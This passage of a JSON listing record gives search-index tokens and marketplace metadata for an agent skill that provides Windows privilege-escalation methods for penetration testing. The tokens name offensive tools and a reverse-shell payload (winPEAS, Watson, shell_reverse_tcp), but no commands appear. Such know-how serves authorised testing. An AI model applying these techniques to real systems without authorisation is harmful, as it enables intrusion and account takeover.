'vuln':1526,1536,1557,1561 'vuln.exe':1552 'vulner':14,52,160,399,406,703,807,917,1131,1356,1409 'w':1540 'w64':1029,1041 'w64-mingw32-gcc':1028 'watson':930,1139 'watson.exe':933,1140 'weak':172,1202 'wes.py':926,1672 'whoami':228,233,235,237,417,843,911,1068,1084,1107,1221,1470,1654 'wifi':589,609 'win32k':983 'window':2,16,39,54,99,123,402,429,437,482,490,554,558,563,567,657,739,751,788,798,860,870,884,920,950,984,991,998,1032,1044,1149,1162,1165,1171,1174,1180,1281,1416,1426,1481,1581,1657,1668 'windows-privilege-escal':1 'windows/x64/shell_reverse_tcp':813,1439 'winlogon':493,1584 'winpea':103,1122 'winpeas.exe':1123 'winvnc3':516 'winvnc4':525 'wlan':595,602,619,629 'wmic':195,198,217,322,725,740,1195,1514 'won':1633 'workflow':174,1696 'workgroup':1072 'writabl':1159 'write':1258,1530 'written':129,1331 'wrong':1651 'wsl':1077,1082,1083,1090,1106,1108 'x64':1025 'x86':1026,1038 'xml':452,458,538 'xp/2003':971","prices":[{"id":"52dbc654-87d9-4838-8895-0d973eb4305b","listingId":"e6096ef5-e942-4a1a-b1e7-5be46f7e7f58","amountUsd":"0","unit":"free","nativeCurrency":null,"nativeAmount":null,"chain":null,"payTo":null,"paymentMethod":"skill-free","isPrimary":true,"details":{"org":"sickn33","category":"antigravity-awesome-skills","install_from":"skills.sh"},"createdAt":"2026-04-18T21:47:37.491Z"}],"sources":[{"listingId":"e6096ef5-e942-4a1a-b1e7-5be46f7e7f58","source":"github","sourceId":"sickn33/antigravity-awesome-skills/windows-privilege-escalation","sourceUrl":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/windows-privilege-escalation","isPrimary":false,"firstSeenAt":"2026-04-18T21:47:37.491Z","lastSeenAt":"2026-04-22T00:51:59.272Z"}],"details":{"listingId":"e6096ef5-e942-4a1a-b1e7-5be46f7e7f58","quickStartSnippet":null,"exampleRequest":null,"exampleResponse":null,"schema":null,"openapiUrl":null,"agentsTxtUrl":null,"citations":[],"useCases":[],"bestFor":[],"notFor":[],"kindDetails":{"org":"sickn33","slug":"windows-privilege-escalation","github":{"repo":"sickn33/antigravity-awesome-skills","stars":34404,"topics":["agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows","antigravity","antigravity-skills","claude-code","claude-code-skills","codex-cli","codex-skills","cursor","cursor-skills","developer-tools","gemini-cli","gemini-skills","kiro","mcp","skill-library"],"license":"mit","html_url":"https://github.com/sickn33/antigravity-awesome-skills","pushed_at":"2026-04-21T16:43:40Z","description":"Installable GitHub library of 1,400+ agentic skills for Claude Code, Cursor, Codex CLI, Gemini CLI, Antigravity, and more. Includes installer CLI, bundles, workflows, and official/community skill collections.","skill_md_sha":"1ca00a80291cc7fee501aa4bf2ac1acadfe4bc45","skill_md_path":"skills/windows-privilege-escalation/SKILL.md","default_branch":"main","skill_tree_url":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/windows-privilege-escalation"},"layout":"multi","source":"github","category":"antigravity-awesome-skills","frontmatter":{"name":"windows-privilege-escalation","description":"Provide systematic methodologies for discovering and exploiting privilege escalation vulnerabilities on Windows systems during penetration testing engagements."},"skills_sh_url":"https://skills.sh/sickn33/antigravity-awesome-skills/windows-privilege-escalation"},"updatedAt":"2026-04-22T00:51:59.272Z"}}